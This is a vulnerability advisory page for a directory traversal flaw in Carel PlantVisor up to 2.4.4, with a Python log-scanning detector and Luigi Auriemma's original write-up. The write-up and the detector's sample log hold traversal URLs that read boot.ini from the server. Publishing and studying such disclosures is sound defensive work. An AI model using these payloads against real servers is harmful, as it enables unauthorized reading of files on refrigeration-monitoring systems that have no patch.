Vendor: PlantVisor
By: Luigi Auriemma
CVSS: 7.5 (HIGH)
CWE: 22 (Directory Traversal)
Product Name: PlantVisor
Affected Version From: <= 2.4.4
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:carel:plantvisor:2.4.4
Metasploit:
Other Scripts:
Platforms Tested: Windows
2011

Carel PlantVisor directory traversal vulnerability

Carel PlantVisor versions <= 2.4.4 are affected by a directory traversal vulnerability that allows an attacker to download files located on the disk where the software is installed. Traversal sequences are accepted with either slash or backslash separators, both in literal form and as their HTTP-encoded values.

Mitigation:

No fix available
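
With no patch listed, a compensating control is to detect (or block at a fronting proxy) requests whose path contains a `..` segment once all the separator variants described above are normalized. The following Python sketch is an added example, not code from the advisory or from the vendor; the Common Log Format layout, the sample log lines, the IP addresses and the decode-round limit are constructed assumptions, and unwrapping nested percent-encoding goes beyond the single-encoded forms the advisory lists.

```python
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # assumption: how many layers of percent-encoding to unwrap

# Assumed access-log layout (Common Log Format); adjust to the real log source.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def normalize_target(target):
    """Return (path, stable): path is percent-decoded with backslashes folded
    to '/', stable is False if encoding layers remain after the round limit."""
    path = target.split("?", 1)[0]
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/"), unquote(path) == path

def is_traversal(target):
    """Flag a '..' path segment; fail closed when decoding never settles."""
    path, stable = normalize_target(target)
    return (not stable) or ".." in path.split("/")

def scan(log_text):
    """Return (client_ip, raw_target, status) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal(m["target"]):
            hits.append((m["ip"], m["target"], int(m["status"])))
    return hits

# Constructed sample log, not captured traffic.
SAMPLE_LOG = r'''192.0.2.10 - - [13/Sep/2011:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
192.0.2.44 - - [13/Sep/2011:10:00:02 +0000] "GET /..%5c..%5c..%5cboot.ini HTTP/1.1" 200 211
192.0.2.44 - - [13/Sep/2011:10:00:03 +0000] "GET /../../../boot.ini HTTP/1.1" 200 211
192.0.2.44 - - [13/Sep/2011:10:00:04 +0000] "GET /..\..\..\boot.ini HTTP/1.1" 200 211
192.0.2.44 - - [13/Sep/2011:10:00:05 +0000] "GET /..%2f..%2fboot.ini HTTP/1.1" 200 211
192.0.2.10 - - [13/Sep/2011:10:00:06 +0000] "GET /reports/v1..2/data.csv HTTP/1.1" 200 90
192.0.2.44 - - [13/Sep/2011:10:00:07 +0000] "GET /%252e%252e%255cboot.ini HTTP/1.1" 404 0
'''

if __name__ == "__main__":
    for ip, target, status in scan(SAMPLE_LOG):
        print(f"{ip} status={status} target={target}")
```

A flagged request that returned status 200 deserves priority in triage, since the server answered it with content rather than an error.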

Exploit-DB raw data:

#######################################################################

                             Luigi Auriemma

Application:  Carel PlantVisor
              http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_prodotto=310
Versions:     <= 2.4.4
Platforms:    Windows
Bug:          directory traversal
Exploitation: remote
Date:         13 Sep 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's homepage:
"PlantVisor Enhanced is monitoring and telemaintenance software for
refrigeration and air-conditioning systems controlled by CAREL
instruments."


#######################################################################

======
2) Bug
======


CarelDataServer.exe is a web server listening on port 80.

The software is affected by a directory traversal vulnerability that
allows downloading the files located on the disk where it's installed.
Both slash and backslash and their HTTP encoded values are supported.


#######################################################################

===========
3) The Code
===========


http://SERVER/..\..\..\..\..\..\boot.ini
http://SERVER/../../../../../../boot.ini
http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
http://SERVER/..%2f..%2f..%2f..%2f..%2f..%2fboot.ini


#######################################################################

======
4) Fix
======


No fix.


#######################################################################